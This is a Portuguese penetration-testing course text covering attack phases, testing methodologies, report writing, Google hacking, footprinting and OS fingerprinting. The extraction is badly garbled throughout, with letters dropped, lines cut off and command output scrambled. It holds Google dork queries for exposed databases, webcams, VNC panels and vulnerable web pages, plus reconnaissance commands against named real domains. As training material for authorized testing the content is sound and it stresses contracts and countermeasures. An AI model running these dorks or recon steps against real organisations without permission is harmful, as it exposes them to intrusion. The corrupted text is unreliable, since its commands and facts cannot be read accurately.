%!4! s ases de um ata&ue Hm ataqueE ou teste de invasãoE  omposto por uma srie de fasesE onde em ada uma determinadas operaç%es são realiDadas. O que vai definir a diferença de um teste de invasão e um ataque realiDado por um ra:erE são justamente a intençãoE o esopo e o espaço de tempo disponível para o mesmo. 4s fases b3sias de um ataque são e
2.4.1. Lean"a(en"o e Infor(a)es ;ssa  a fase mais importante de um ataque e de um teste de invasão. +aseado no que  desoberto nessa faseE todo o planejamento  realiDado e os vetores de ataque definidos. ;ssa fase prossegue na fase seguinteE onde as informaç%es iniiais são e
Conorrentes

●

'ome de funion3rios

●

;ndereços

●

elefones

●

Sites

Capítulo 2 Introdução ao !e"te de In#a"ão e $t%&a 'a&(er - 32 ●

;mpresas

●

Comunidades soiais

●

;mpresas do mesmo grupo e et.

2.4.2. arre'ra 'essa fase o ataante busa informaç%es mais detaladas o alvoE que posam permitir definir seus vetores de ataque e en
Rual sistema operaional o alvo utiliDa!

●

Ruais os serviços estão sendo e
●

Ruais serviços estão disponíveis para aesso!

●

Rual a versão de ada serviço sendo e
●

>3 I-S&I$S na rede!

●

>3 oneApots na rede!

●

>3 fireGalls na rede!

●

;
●

>3 serviços om aesso pQblio rodando em alguma m3quina!

●

>3 algum softGare maliioso j3 sendo e
4 partir dessas informaç%esE o ataante pode busar maiores detales na internet ou f7runs espeialiDados em busa de e

2.4.3. anano a!esso 4qui o ataante oloa em pr3tia tudo aquilo que planejou a partir das informaç%es obtidas previamente. -ependendo de seus vetores de ataqueE ele pode realiDar uma srie de ataques busando ganar aesso ao sistema alvoE omo por e
4taques de força bruta loal

●

4taques de força bruta remoto

●

Captura de tr3fego de rede

●

4taque de engenaria soial

●

4taques às apliaç%es 8;+

●

;
●

;
Conseguindo aesso ao sistemaE o ataante realiDar3 uma srie de operaç%es busando a elevação de seus privilgios aso o mesmo j3 não seja de root.

2.4.4. *an"eno a!esso 4p7s onseguir o aessoE o ataante busaE de alguma formaE manter o aesso onseguido atravs de seus ataques. Isso normalmente não  utiliDado por um pen testerE a não ser que seja e

desneess3rios ao alvo.

2.4.5. Li($ano ras"ros 'essa fase final do ataqueE o ataante apaga todos os seus rastrosE todos os registros de operaç%es realiDadas dentro do sistema omprometido. Como o pen tester tem autoriDação para realiDar os testesE não  neess3rio apagar rastros. Isso se torna importante para um pen testerE apenas se quiser testarE tambmE a apaidade da equipe de períia forense e respostas a inidentes de desobrir o que foi feito e reuperar informaç%es alteradas.

%!-! Categorias de ata&ues >3 v3rios tipos de ataque possíveis de serem realiDados. $odemos dividir tais ataques em dois grandes grupos?

2.5.1. Serer Sie &""a!/s Server Side 4tta: ou ataque ao servidor foa na tentativa de e
São e
●

4taques a servidores 8;+

●

4taques a servidores de e,mail

●

4taques a servidores -'S

●

4taques a serviços B$C


2.5.2. Clien" Sie &""a!/s Client Side 4tta:s ou ataques ao liente foa na tentativa de e
;
●

;
●

;
●

;
'esses asosE o liente preisa visitar um siteE ou abrir um e,mailE ou então abrir um arquivo que e
%!6! 3etodologias e8istentes $ara um teste de invasão não fiar XsoltoY e sem uma sequVnia l7gia oerenteE a omunidade de segurançaE atravs de alguns 7rgãosE assoiaç%esE institutos e pesquisadoresE riou uma srie de metodologias para servirem omo guias b3sios para a orreta realiDação de testes de invasão. Isso permite uma erta padroniDação nos testes realiDados seguindo uma outra metodologia. $odemos itar as seguintes metodologias oneidas internaionalmente? ●

OSS66

●

O84S$ esting 9uide

Capítulo 2 Introdução ao !e"te de In#a"ão e $t%&a 'a&(er - 36 ●

'IS S$**,11( e S$**,#2

●

ISS4F

●

$enest FrameGor:s

'osso treinamento foi feito baseado na metodologia OSS66 Open Soure SeuritA esting 6etodologA 6anualJE e nessa metodologia as premissas para realiDar um teste são? ●

O teste dever ser onduDido e
●

O teste deve ontemplar todos os itens neess3rios

●

O esopo do teste não deve ferir os direitos umanos b3sios

●

Os resultados devem ser quantifi3veis

●

Os resultados devem ser onsistentes

●

Os resultados devem onter apenas o que foi obtido om os testes

;ssas são as premissas de um teste de intrusão. 4inda em aordo om a OSS66E o resultado final deve onter os seguintes t7pios? ●

-ata e ora dos testes

●

empo de duração dos testes

●

4nalistas e pessoas envolvidas

●

ipo do teste

●

;sopo do teste

●

O resultado da enumeração

●

6argens de erro

●

Rualifiação do riso

●

Rualquer tipo de erro ou anomalia desoneida


Dica: a metodologia 'SST(( é voltada mais para testes em sistemas e infraestrutura, apesar de tam)ém contemplar testes em aplica*+es ." / metodologia desenvolvida pelo '/S, 12 é específica para testes de invas3o em aplica*+es ."

%!! Como .ondu>ir um teste de invasão 4lguns passos b3sios são neess3rios para a preparação e realiDação de um teste de invasãoE para que o mesmo seja bem suedido. -entre esses passosE ou fasesE podemos destaar os seguintes? 'asso () Con&erse com seu cliente sobre as necessidades do teste  ;sse  um dos passos mais importantesE pois não podemos dei

4 partir da formação da equipe e definição de papis para ada profissionalE podemos agendar o teste om o liente e iniiar o planejamento do mesmo om a equipe em onjunto. 'asso ,) eali.e o teste teste  'esse passo  onde o teste  efetivamente e
%!2! spe.tos ?egais = importante atentarmos para os aspetos legais de um teste de invasãoE e se os mesmo estão de aordo om as leis vigentes no paísE e prinipalmente om o que foi assinado no ontrato de prestação de serviço ou '-4. -evemos lembrar,nos de uma oisa?


;S; -; I'@4SO S;6 $;B6ISSO = CBI6;W $ortantoE tena sempre um ontrato prvio assinado om o lienteE onde serão definidos os seguintes pontos? ●

/imites do teste? at onde pode ir

●

>or3rios? períodos de menor utiliDação ou menos rítios

●

;quipe ;quipe de supo suport rte? e? aso aso aja aja algu algum m para para toma tomarr provid providVn Vnia iass aso aso

algum ataque tena efeitos olaterais ●

Contatos? ao menos trVs ontatosE om e,mailE endereço e telefone

$ermi ermiss ssão ão assi assina nada da?? um dou doume ment nto o assi assina nado do pelo pelo resp respon ons3 s3vel vel pela pela empresaE om os nomes das pessoas da equipe autoriDadas a realiDar os testes. ●

-entro do que foi aordadoE devemos ter o m3
%!! 78er.í.ios te9ri.os 1  Rual o objetivo da OSS66! ______________________________________________________________________ ______________________________________________________________________ 2  Rual a neessidade da utiliDação de uma metodologia para realiDar um teste de invasão!


______________________________________________________________________ ______________________________________________________________________ "  Cite algumas publiaç%es espeiais da 'IS que poderiam ser utiliDadas para a realiDação de um teste de invasão. ______________________________________________________________________ ______________________________________________________________________ #  Ruais as fases de um ataque! ______________________________________________________________________


Capítulo ) 7s.rita de Relat9rio

)!1! "#$etivos ●

●

●

;ntender o que  um relat7rio 4prender o que deve onter em um relat7rio de teste de invasão -esenvolver um modelo b3sio de relat7rio de teste de invasão

Capítulo 3 )"&r%ta de *elat+r%o - 42

)!%! " &ue ' um relat9rio( Hm relat7rio  um onjunto de informaç%esE utiliDado para reportar resultados pari pariai aiss ou tota totais is de uma uma dete determi rmina nada da ativi ativida dade deEE e
)!)! " &ue deve .onter no relat9rio 4 estrutura b3sia de um relat7rio de teste de invasão deve respeitarE respeitarE ao menosE os seguintes t7pios? •

Capa Onde deve estar presente o nível de onfidenialidade do doumento. -eve apresentar tambm o nome do ontratado e do ontratante. Outra informação importante  o nome da pessoa ao qual o relat7rio est3 sendo endereçadoE sendo o representante da ontratante omo e
•

Índice Failitar3 a ompreensão das seç%es e
•

Classificação do n2&el de confidencialidade do documento 'esta seção  importante itar novamente o nível de onfidenialidade do


doumentoE destaando a quem o doumento est3 endereçadoE om posterior assinatura do representando do ontratante e do ontratado.

•

Sumário e3ecuti&o 'o sum3rio e
•

4efinição do escopo 'a definição de esopo  onde desrevemos o tipo e o nível do teste realiDadoE desrevendo o que foi e at onde foi testado. 4quiE nos baseamos nas permiss%es que reebemos do ontratanteE de at onde podemos ir e o que podemos faDer.

•

4efinição dos &etores de ata5ue 4qui entra o mapa mental que riamos om os possíveis vetores de ataque e o planejamento

para

ada

possibilidade.

-efinimos

tambm

as

v3rias

possibilidades de ataqueE lassifiando,as de aordo om o nível de failidade para alançar o objetivo definido no esopo do teste. Outro aspeto que entra nessa seção são os resultados obtidos om o mapeamento da rede e a definição dos alvos.

•

Ata5ues reali.ados 'a definição dos ataques realiDadosE v3rias informaç%es devem estar ontidas nessas definiç%es. São elas? ✔

Ferramentas utiliDadas

Capítulo 3 )"&r%ta de *elat+r%o - 44 ✔

;
✔

Comandos utiliDados

✔

Besultados reebidos

✔

Classifiação das vulnerabilidades por nível de failidade de e
•

Solução ;ssa Qltima seção  onde vulnerabilidades enontradas.

informamos

possíveis

soluç%es

para

as


Capítulo 4 oogle ;a.
4!1! "#$etivos ●

;ntender o que  9oogle >a:ing

●

Coneer os risos que o 9oogle traD

●

●

●

4prender omo usar o 9oogle omo ferramenta au-

Capítulo 4 ,oogle 'a&(%ng - 46

4!%! oogle ;a.a:ing  a atividade de usar reursos de busa do siteE visando ataar ou proteger melor as informaç%es de uma empresa. 4s informaç%es disponíveis nos servidores Geb da empresa provavelmente estarão nas bases de dados do 9oogle. Hm servidor mal onfigurado pode e
;sse reurso permite que tenamos aesso às p3ginas que j3 foram tiradas do arE desde que ainda e

4!)! Comandos vançados do oogle 4.3.1. in"i"le allin"i"le +usa onteQdo no título tag titleJ da p3gina. Ruando utiliDamos o omando intitleE  importante prestar atenção à sinta
4.3.2. in'rl allin'rl ;nontra te
4.3.3. file"$e +usa por um arquivo de determinado tipo. O 9oogle pesquisa mais do que apenas p3ginas Geb. = possível pesquisar muitos tipos diferentes de arquivosE inluindo $-F 4dobe $ortable -oument FormatJ e 6irosoft Offie. O operador filetApe pode ajud3,lo na busa de tipo de arquivos espeífios. 6ais espeifiamenteE podemos utiliDar esse operador para pesquisas de p3ginas que terminam em uma determinada e

4.3.4. allin"e" /oaliDa uma string dentro do te
4.3.5. si"e -ireiona a pesquisa para o onteQdo de um determinado site. 4pesar de ser teniamente uma parte da HB/E o endereço ou nome de domínioJ de um servidor pode ser mais bem pesquisada om o operador site. Site permite que voV proure apenas as p3ginas que estão ospedadas em um servidor ou domínio espeífio.

4.3.6. lin/ +usa por lin:s para uma determinada p3gina. ;m veD de forneer um termo de pesquisaE o operador neessita de um lin: HB/ ou nome do servidor omo um argumento.

4.3.7. inan!or /oaliDa te

inanor?li: ou inanor?#linu<. ;ste tipo de pesquisa ser3 Qtil espeialmente quando omeçamos a estudar formas de busar relaç%es entre sites.

4.3.8. a"eran#e +usa por p3ginas publiadas dentro de um XrangeY de datas. @oV pode usar este operador para loaliDar p3ginas inde
4.3.. !a!e 6ostra a versão em ae de uma determinada p3gina. Como j3 disutimosE o 9oogle mantm ZsnapsotsZ de p3ginas que inde
4.3.10. info 6ostra onteQdo e

O operador info mostra o resumo das informaç%es de um site e fornee lin:s para outras pesquisas do 9oogle que podem pertener a este site. O parUmetro informado à este operadorE deve ser uma HB/ v3lida.

4.3.11. rela"e 6ostra sites relaionados. O operador related e
Dica: Se voc5 est2 reali6ando um pentest em um site c#in5s, para que usar um google"com")r7 ' oogle priori6a os resultados para determinados %e)sites" 9aramente voc5 v5 p2ginas escritas em 1apon5s, c#in5s, 2ra)e e outros quando usa o google"com")r, n3o7 ma )oa )usca é feita em servidores diferentes, com países diferentes"

4!4! oogle ;a.3 um bano de dados virtualE om tags de busa no 9oogle previamente riadasE para onseguir informaç%es espeífias. 4 partir das tags e
Capítulo 4 ,oogle 'a&(%ng - 51 oogle ;ac&ing Data)ase: #ttp:$$1o#nn<"i#ac&stuff"com$g#d)$

4!-! ?evantamento de inormaç*es O 9oogle  a prinipal ferramenta para o levantamento de informaç%es de nosso alvo. = o melor sistema pQblio para utiliDarmos em busa de informaç%es sobre qualquer oisa em relação ao nosso alvo? sitesE propagandasE pareirosE redes soiaisE grupos e et. 4lm do 9oogleE 3 outros sites espeífios que au
4!6! Contramedidas ●

$ossuir uma boa polítia referente às publiaç%es de informaç%es na internet.

●

'ão dei
●

Sempre analisar as informaç%es disponíveis sobre a empresa em sites de busa.

●

4lertar e treinar os funion3rios da empresa om relação a maneira om que um ataque de engenaria soial pode aonteerE e as possíveis informaç%es que o ataante poder3 usar nesse ataque.


4!! Pr/ti.a dirigida +usa por arquivos de base de dados em sites do governo? ➢

site?gov.br e
+usa por um servidor espeífio ➢

inurl?ZpoGered bAZ site?sistema.om.br

4 pesquisa busa arquivos de e,mail em formato .mdb ➢

inurl?e,mail filetApe?mdb

;ssa pesquisa busa telefones disponíveis em intranet enontradas pelo 9oogle ➢

inurl?intranet ] inte
BealiDando uma pesquisa dessa maneira  possível identifiar muitos dos subdomínios da Orale ➢

site?orale.om ,site?GGG.orale.om

-etetando sistemas que usando a porta ** ➢

inurl?** ,inte
;nontrando @'C ➢

intitle?@'C inurl?(** intitle?@'C

;nontrando @'C ➢

intitle?Z@'C @ieGer for PavaZ


;nontrando 8ebam ativa ➢

Z4tive 8ebam $ageZ inurl?**

;nontrando 8ebam da tosiba? ➢

intitle?Ztosiba netGor: amera , Hser /oginZ

;nontrando 4pae 1.".2*? ➢

Z4pae&1.".2* server atZ intitle?inde<.of

4steris: @OI$ Flas Interfae ➢

intitle?ZFlas Operator $anelZ ,e
$ossíveis falas em apliaç%es Geb? ➢

allinurl?Z.pp!siteZ

➢

allinurl?Z.pp!doZ

➢

allinurl?Z.pp!ontentZ

➢

allinurl?Z.pp!meioZ

➢

allinurl?Z.pp!produtoZ

➢

allinurl?Z.pp!atZ


Capítulo ?evantamento de Inormaç*es

-!1! "#$etivos ●

Coneer os prinipais meios para oletar informaç%es sobre o alvo

●

Coletar informaç%es utiliDando ferramentas pQblias

●

Coletar informaç%es utiliDando ferramentas espeífias

●

/evantar domínios utiliDando onsultas pQblias e ferramentas

Capítulo 5 e#antaento de Inforaç.e" - 55

-!%! Aootprint Footprint  a primeira etapa a ser realiDada em um teste de intrusão. -urante essa etapaE o $en,tester oleta o m3
B@Dme seis Eoras para .ortar uma /rvoreF e eu gastarei as primeiras &uatro Eoras aiando o ma.Eado!B &%raa( Lin!oln

-!)! Por onde .omeçar( O primeiro passo para omeçar a oleta de informaç%es  navegar no Gebsite do alvo. @amos tomar omo e
-ois e,mails v3lidos

Capítulo 5 e#antaento de Inforaç.e" - 56 ●

Hm endereço para aompanar as estatístias dos servidores

●

; uma lista om tenologias e forneedores

'ão aredita! ;ntão de uma olada? Os e,mails são Gebmaster:ernel.org e ftpadmin:ernel.org ttp?&&ati.:ernel.org&grap_vieG.pp!ationprevieG ttp?&&GGG.:ernel.org&poGered.tml 4inda não enontrou! ;ntão e
-!4! Consulta a inormaç*es de domínio 4p7s observar o site do alvoE  de interesse do ataante oneer detales referentes ao nome de domínio do liente. 4 primeira oisa a ser feita  busar informaç%es sobre o propriet3rio de um domínio. Isso pode ser feito utiliDando o omando Gois. =%#ois >linu4"com")r

@amos qual o resultado que obtemos a esse omando? domain:

>linu4"com")r

o%ner:

>linu4 Soft%are e ?omércio de rogramas @tda

o%nerid:

00>">A"!B$000-A!

responsi)le: 9odolfo o))i countr<:

.9

o%ner-c:

9C>

admin-c:

9C>

Capítulo 5 e#antaento de Inforaç.e" - 57 tec#-c:

?/D'

)illing-c: 9C> nserver: nsstat:

ns">linu4"com")r B00"BB"BB"E B000FF //

nslastaa:

B000FF

nserver:

nsB">linu4"com")r FF"8"8E"!8

nsstat:

B000FF //

nslastaa:

B000FF

created:

B000!8 =!FA!0

e4pires:

B00!8

c#anged: status:

B000!B! pu)lis#ed

nic-#dl-)r: ?/D' person:

?esar /ugusto Domingos

e-mail:

cesar"domingosGgmail"com

created: c#anged:

B00E0AB! B00E0AB!

nic-#dl-)r: 9C> person: e-mail: created: c#anged:

9odolfo Cose (artorano o))i admG>linu4"com")r B00>0A B00E0!0B

$odemos onluir que om um simples omandoE disponível em pratiamente qualquer sistema operaionalE foi possível obter o nome do respons3vel pelo domínioE o nome do respons3vel tnio pelo domínioE o nome dos dois servidores de -'S e o C'$P da empresaE loaliDado no ampo oGnerid. 4lm da onsulta Gois em sistemas operaionaisE  possível ainda utiliDar serviços que onsultam o a base de dados de propriet3rios de domínios atravs de ferramentas GebE omo o pr7prio ttp?&®istro.brE por e
Capítulo 5 e#antaento de Inforaç.e" - 58 #ttps:$$registro")r$cgi-)in$%#ois$

Se ompararmos a saída do site om a saída do omando GoisE veremos que o resultado  idVntio. = importante saber que para ada região do mundo inteiroE 3 organiDaç%es respons3veis pelo registro de domíniosE aima das organiDaç%es respons3veis pelos registros em ada país. 'o quadro abai
-!-! Consultando servidores @,S Como sabemosE os servidores -'S são respons3veis por traduDir os nomes an\nios de um domínio para o seu respetivo endereço I$. Sendo assimE um servidor -'S onee todos servidores que estão aessíveis atravs da rede pQblia. @amos onsult3,loE então.

dig -t (H >linu4"com")r dig -t NS >linu4"com")r

Os ampos 6KE e 'S forneemE respetivamenteE o nome dos servidores de e, mail e o nome de todos os servidores de -'S.


Com essa onsultaE j3 onseguimosE inlusiveE endereços de servidores que utiliDaremos em nossa varredura e enumeração de serviços.

-!6! Consultando Ge#sites antigos 4lm da possibilidade de utiliDarmos a opção em ae do 9oogleE  possível utiliDarmos outros serviços que possibilitam que aessemos vers%es mais antigas de qualquer site que j3 tena sido publiado na Geb.

#ttp:$$%%%"arc#ive"org

Com issoE podemos enontrar informaç%es que podem ser QteisE prinipalmente para ataques de engenaria soialE pois enontramos produtos antigosE e<,funion3riosE informaç%es que foram retiradas do site por serem sensíveis e et. HtiliDando esse serviço e pesquisando o site da #/inu

-!! 5e#spiders 8ebspiders são programas que navegam automatiamente por Gebsites para oletar informaç%es. $ensando no 9oogleE um Gebspider feito pelo 9oogle navega pelos lin:s das p3ginas e alimenta uma base de dados do 9oogleE que  usada para onsultas durante as busas realiDadas pelos usu3rios. @amos parar e lembrar omo funionavam antigamente os sistemas de busas omo TaooWE Cade!E 4onde.omE dentre outros. 4ntigamenteE n7s preis3vamos adastrar os nossos sites e as palavras ave referentes ao siteE para ele ser enontrado durante as busas. $ormE o 9oogle inovou na maneira de alimentar as bases de dados deleE usando Gebspider. >ojeE basta que um site esteja na internet e lin:ado para que ele apareça nas bases do 9oogleE sem preisar de nenum adastro por parte do riador do site nas ferramentas de busas. $ormE isso elinu4"com")r$ro)ots"t4t

$ortantoE os arquivos robots.t
-!2! ,et.rat 'etraft  uma empresa europia que prove serviços de internet. -entro de


alguns serviços que ela fornee est3 a an3lise de merado para empresas de Geb osting e servidores GebE inluindo deteção do sistema operaional e versão do servidor GebE e em alguns asosE informaç%es sobre uptime do servidorE j3 que normalmente esse fator  determinante na esola de uma empresa de ospedagem de sites. $ara n7sE pode ser Qtil para e
-!! Hus.ando rela.ionamentos 4travs de relaionamentos enontrados na GebE podemos onseguir mais informaç%es de nosso alvo. Informaç%es de relaionamentos podem ser enontradas em site om lin:s para o site do alvoE sites seund3rios que tem relação om o site prinipal do alvoE ompanias que faDem neg7ios ou estão sob a mesma administração que nosso alvo e et. ;ssas servem para entendermos melor omo a organiDação trabalaE se possui outros ramos de atividadesE organiDaç%es XirmãsY e parerias. Com tais informaç%es em mãosE e um melor oneimento da estrutura organiDaionalE podemosE inlusiveE realiDar ataques de engenaria soial mais efiaDes. O 9oogle nos fornee alguns operadores que nos au
info

●

lin:

●

related

Capítulo 5 e#antaento de Inforaç.e" - 62 #ttp:$$%%%"unmas¶sites"com$

-!10! Pr/ti.a dirigida @amos realiDar algumas onsultasW 4 partir do site GGG.#linu<.om.br onsiga o m3
●

8ois ? retornar3 o resultado da onsulta à entidade respons3vel pelos registros de domínioE no nosso aso o registro.br. Conseguiremos nome dos respons3veisE telefoneE C$F ou C'$PE endereçoE e,mail e et.

●

-ig ? onseguiremos informaç%es sobre os servidores onde o domínio est3 ospedado. eremos o endereço do servidor de domínio e de e, mailE por e
●

'sloo:up ? retornar3 o I$ do domínio e o nome do mesmoE inluindo a porta a partir da qual o servidor est3 respondendo no aso do -'SE a padrão  a ("J.

●

%%%"netcraft"com ? permite que saibamos qual sistema operaional o

servidor est3 e
%%%"Bpeople"com ? esse site não busa informaç%es sobre domínioE

mas sobre pessoas. 'a onsulta om o Gois obtivemos alguns nomesE e nesse site podemos onsultar as referVnias na Geb aera desse nome notíiasE artigosE postagens relevantesJ.


Com ada um desses omandos e sitesE onseguiremos algumas informaç%es diferentesE que nos ajudarão na pr7
-!11! Rastreamento de 7Dmails 4 an3lise de e,mails  normalmente feita pela 3rea de Forense Computaional. $ormE podemos usar um e,mail para obter informaç%es sobre o ost da pessoaE quando esse não  de oneimento do ataante e preisa ser desobertoE pois  um possível alvo. O orreio eletr\nio  dividido em duas partes? Cabeçalo >eaderJ e Corpo +odAJ do e,mail. 'o abeçalo  onde enontramos diversos ampos om informaç%es de ontroleE destinat3rioE remetenteE data de envioE dentre outras informaç%es. ;  no orpo da mensagem que enontramos a mensagemE em si. -e aordo om a Bf 221 & 222 E temos os seguintes ampos presentes no abeçalo de um e,mail? Campos de origem? ●

XFrom?Y , autor da mensagem

●

XSender?Y , remetente da mensagem

●

XBeplA,to?Y , e,mail sugerido pelo autor da mensagem para que as respostas sejam enviadas

Campos de destino? ●

Xo?Y , endereço dos reeptores prim3rios da mensagem

●

XC?Y , Carbon CopA  reeberão uma 7pia da mensagemE om o e, mail visível para todos

●

X+?Y , +lind Carbon CopA  reeberão uma 7pia da mensagemE sem ter o e,mail visível para todos

Campo de data de origem?

Capítulo 5 e#antaento de Inforaç.e" - 64 ●

X-ate?Y  >ora da riação da mensagem

Campos de identifiação? ●

X6essage,I-?Y  Identifiador de mensagem Qnio. @alor Qnio determinado pelo servidor que transmite a mensagem

●

XIn,BeplA,o?Y  Hsado quando uma mensagem  respondida. Identifiador da mensagem respondida

●

XBeferenes?Y  Hsado quando uma mensagem  respondida. BeferVnias.

Campos de informação? ●

XSubjet?Y  4ssunto da mensagem

●

XComments?Y  Coment3rios sobre a mensagem

●

XeAGords?Y  $alavras aves relaionadas à mensagem

Campos de Bastreamento? ●

XBeturn,$at?Y  Camino de volta da mensagem para o remetente. ;sse ampo  adiionado pelo Qltimo 64 que entrega o e,mail ao destinat3rio

●

XBeeived?Y  Contm informaç%es para ajudar na an3lise de problemas om a entrega e reebimento das mensagens. odo e,mail possui pelo menos um ampo XBeeivedYE que  adiionado por ada servidor onde a mensagem passa.

O ampo que interessa a n7s  o ampo XBeeived?YE que ontm informaç%es sobre o endereço I$ de onde a mensagem de orreio eletr\nio partiu.

@amos ver um e
Capítulo 5 e#antaento de Inforaç.e" - 65 Teste de cabeçalho de e-mail Sexta-feira, 7 de Maio de 2010 11:56 From Li! "ieira Fri Ma# 7 1$:56:10 2010 %-&''are(tl#-To: lo)i*br+#ahoocombr ia 671.5/1.0 Fri, 07 Ma# 2010 07:56:6 -0700 etr(-3ath: 4li!t+mailcom %-8Mail9S: ;22L;S52hi1(2?*M@ot#A/f=)'#6)LAB"%e0o.d/!Ci*@!3'.l/sxD=FECoSD=Acm'?D<29=l06 Dt'ms;oC(8of$Ca)F"dx8*m8!2%xcIr1#cra1=0/l d1tMTdaF2f7)G10D&dxm1#728>%3lL/$c2%%0&D8>E3o&67l"69)L?%T/f?7&e!"r7;@3b9?e1fi("% mH;FsmHic&x5'h2060#cS@oH$D65II3?2mLafs2O)xi bH8)I1%f#D)xH=x7GOc><=M&Or6T$3I1CSD5e"DGCo.H.h$s>%i7iL T"SM2s.lx?=;e!e7exMMS&MA#hx!'7??6/bE$xoI"08"9)>GTs!@t$d#)&L';A A>.xeA<s)(AHsTFG'2bbGBi&6'=LFci>29 ;omai(De#-Si(atre: arsa-sha1 c(ofs dmailcom samma hmime-ersio(:from:date:messaeid:sbAect:to:co(te(t-t#'e bMed0d.G#5I%a!f(dIB%1EC
'a do abeçalo sublina e em negritoE enontramos o I$ de quem enviou essa mensagemE no aso o I$ 1*.1(1..1# . 'o abeçalo podemos enontrar v3rios ampos BeeivedE pois por ada servidor de e,mail que a mensagem passa  adiionado um novo ampo. $ormE o endereço de quem enviou a mensagem vai apareer no ampo Beeived mais bai

-!1%! Aingerprint Fingerprint  uma das prinipais tnias de levantamento de informação footprintJ que  realiDada por um $en,ester antes que o mesmo omee a realiDar os ataques em seu alvo. 4 função dessa tnia  identifiar a versão e distribuição do sistema operaional que ir3 reeber a tentativa de intrusão. Sendo assimE essa tnia  e
●

●

4nalise de paotes que trafegam pela rede /eitura de banners assinaturas do sistemaJ 4n3lise de partiularidades da pila C$&I$.

$ara realiDar tais an3lisesE podemos utiliDar ferramentas espeífiasE oneidas omo sanners de fingerprintE que são softGares usados para realiDar


tarefas de deteção de sistemas operaionais. ;ntre os sanners e
5.12.1. 9in#er$rin" $assio O sanner atua omo um XfarejadorY na redeE ou sejaE fia esutando os paotes que passam por elaE detetando o formato do paote que esta passando onsegue identifiar o sistema operaional. $ara esse tipo de operaçãoE utiliDamos a ferramenta p*fE que permite XfarejarmosY os paotes que trafegam na rede. =p0f -i et#0 -o log

Com o parUmetro ,i definimos em qual dispositivo de rede ele fiar3 farejando os paotesE se não definimos nadaE ele assume XallYE farejando todos os dispositivos disponíveis. Com o parUmetro ,oE diDemos para o p*f armaDenar tudo o que for apturado em um arquivo de saídaE om nome definido por n7s.

5.12.2. 9in#er$rin" a"io O sanner envia paotes manipulados e forjadosE baseado em uma tabela pr7pria de fingerprint. Com issoE ele analisa a resposta do paote e ompara om a tabelaE para definir qual o sistema operaional. O riso desse tipo de fingerprintE  que se o alvo estiver om um fireGall bem onfigurado e um I-S&I$SE nosso aesso pode ser logado em seu sistema e pode ser difíil que onsigamos muitas informaç%es. -uas ferramentas que podemos utiliDar em um fingerprint ativo são nmap e

5.12.3. Des!o%rino '( Sis"e(a O$era!ional 'sano IC*P Hm simples ping  apaD de revelar o sistema operaional de uma m3quina. = ping %%%">linu4"com")r -c  IN %%%">linu4"com")r FF"8">B">J !F8>J ) )->B-8-FF"reverse"prioritB">J: icmpKseqL ttlL>A timeL>!B ms --- %%%">linu4"com")r ping statistics -- pac&ets transmitted,  received, 0M pac&et loss, time 0ms rtt min$avg$ma4$mdev L >!B"!!$>!B"!!$>!B"!!$0"000 ms =

4 informação importante est3 no ampo / ime o /iveJ. 4 maioria dos sistemas operaionais se diferenia pelo valor retornado de /. @eja a lista abai
CAlades , 'ormalmente "*

●

/inu< , 'ormalmente 0#

●

8indoGs , 'ormalmente 12

●

Ciso , 'ormalmente 2((

●

/inu< ] iptables , 'ormalmente 2((

5.12.4. Cal!'lano :OP HtiliDando os omandos traeroute e ping onjugados para obter informaç%esE podemos alular o ttl e desobrir o sistema operaional do alvo. = traceroute %%%">linu4"com")r traceroute to %%%">linu4"com")r FF"8">B">J, 0 #ops ma4, F0 )F ms 0">E ms B cA0Fff0"static"spo"virtua"com")r B0"F"B!!"J 8"F! ms 8"FE ms 8"FF ms  cA0F00!e"virtua"com")r B0"F"0"A>J 8">! ms 8"!0 ms 8"!0 ms > cA0F000F"virtua"com")r B0"F"0"FJ 8"A>B ms A"0BB ms A"0 ms ! cA0F000d"virtua"com")r B0"F"0"J A"> ms A"!0B ms "0> ms F F>"B0A"08"BB! F>"B0A"08"BB!J B"BE ms E"0EF ms E">> ms E 

Capítulo 5 e#antaento de Inforaç.e" - 69 8 )orderB"tge--))net"acs00B"pnap"net F>"A>"0"AJ E!"!0 ms EF"8! ms EE"BAE ms A sagonet-B")orderB"acs00B"pnap"net E0">B"80"!0J !"F8 ms !">0B ms F"BA8 ms 0 ve>0"core0a"tpa"sagonet"net F"B>F"!A">J >F"!B ms >F"!E> ms >F"!!E ms  gige"ds0a"tpa"sagonet"net F!"0"B"0J >E"!A0 ms >E"E8 ms >8"FF! ms B   

Com o traeroute podemos ver que temos 11 saltosE at que os paotes são interrompidosE o que pode representar um fireGall ou algo do tipo que desarte os paotes. 4gora que sabemos por quantos roteadores estamos passandoE podemos usar o omando ping para desobrir o / do site. = ping %%%">linu4"com")r -c  IN %%%">linu4"com")r FF"8">B">J !F8>J ) )->B-8-FF"reverse"prioritB">J: icmpKseqL ttlL>A timeL>!B ms --- %%%">linu4"com")r ping statistics -- pac&ets transmitted,  received, 0M pac&et loss, time 0ms rtt min$avg$ma4$mdev L >!B"!!$>!B"!!$>!B"!!$0"000 ms =

Somando a quantidade de saltos 11J om o valor de ttl #5JE temos 0*. O mais pr7
5.12.5. 9in#er$rin" a"ra;s o $ro%e2 Ferramenta para fingerprint ativo apresentada na onferenia +la:>at /as, @egas em 2**1 riada por FAodor riador da ferramenta nmap e Ofir 4r:in o, fundador do projeto oneAnet.org. Seu bano de dados de assinaturas fia em?

Capítulo 5 e#antaento de Inforaç.e" - 70 $usr$local$etc$4pro)eB$4pro)eB"conf

;linu4"com")r

4gora tente utiliDar o fingerprint sobre uma porta aberta? = 4pro)eB -p tcp:80:open FF"8">B">

$erebe,se que quanto maior o nQmero de informaç%es que passamos para o
-!1)! Contramedidas ●

Configurar as apliaç%es instaladas nos servidoresE atentando para as informaç%es que elas e
●

Configurar orretamente as regras de fireGall para bloquear requisiç%es maliiosas.

●

er uidado om as informaç%es publiadas na 8;+.

●

Configurar orretamente o arquivo robot.t
-!14! Pr/ti.a dirigida 1. Faça uma varredura no servidor da #/inu< usando a ferramenta dnsenum. 2. Identifique na internet um arquivo robots.t

#. HtiliDando a ferramenta p*fE identifique o sistema operaional de m3quinas e

Capítulo 6 7ntendendo a 7ngenEaria So.ial e o ,oDTe.E ;a.
6!1! "#$etivos ●

;ntender o que  ;ngenaria Soial

●

;ntender o -umpster -iving

●

;ntender os risos assoiados à ;ngenaria Soial

●

;ntender as tnias de 'o,e >a:ing

Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng - 73

6!%! " &ue ' 7ngenEaria So.ial( $odemos onsiderar a engenaria soial omo a arte de enganar pessoas para onseguir informaç%esE as quais não deviam ter aesso. 6uitas veDes empregados de uma empresa dei
